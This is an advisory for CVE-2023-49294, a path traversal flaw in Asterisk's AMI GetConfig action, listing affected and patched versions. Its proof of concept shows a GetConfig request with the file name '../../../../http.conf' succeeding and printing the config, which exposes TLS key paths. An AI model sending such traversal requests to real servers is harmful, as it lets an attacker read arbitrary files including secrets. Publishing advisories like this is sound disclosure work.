Headline
CVE-2023-49294: Path traversal via AMI GetConfig allows access to outside files
Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the live_dangerously is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue.
Package
asterisk (Asterisk)
Affected versions
<= 18.20.0
<= 20.5.0
= 21.0.0
Patched versions
18.20.1
20.5.1
21.0.1
certified-asterisk (Asterisk)
Summary
It is possible to read any arbitrary file via AMI even when the live_dangerously is not enabled.
Details
CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
https://owasp.org/www-community/attacks/Path_Traversal
https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757
PoC
cp /config/asterisk/default/http.conf /
This is denied as expected:
Action: GetConfig
Filename: /http.conf
ActionID: 09235013
Response: Error
ActionID: 09235013
Message: File requires escalated priveledges
This is not denied as expected:
Action: GetConfig
Filename: ../../../../http.conf
ActionID: 09235015
Response: Success
ActionID: 09235015
Category-000000: general
Line-000000-000000: enabled=yes
Line-000000-000001: bindaddr=[::]
Line-000000-000002: bindport=8088
Line-000000-000003: tlsenable=yes
Line-000000-000004: tlsbindaddr=[::]:8089
Line-000000-000005: tlscertfile=/etc/asterisk/keys/fullchain.pem
Line-000000-000006: tlsprivatekey=/etc/asterisk/keys/privkey.pem
Impact
Allow arbitrary files to be read.
Related news
Debian Linux Security Advisory 5596-1 - Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange.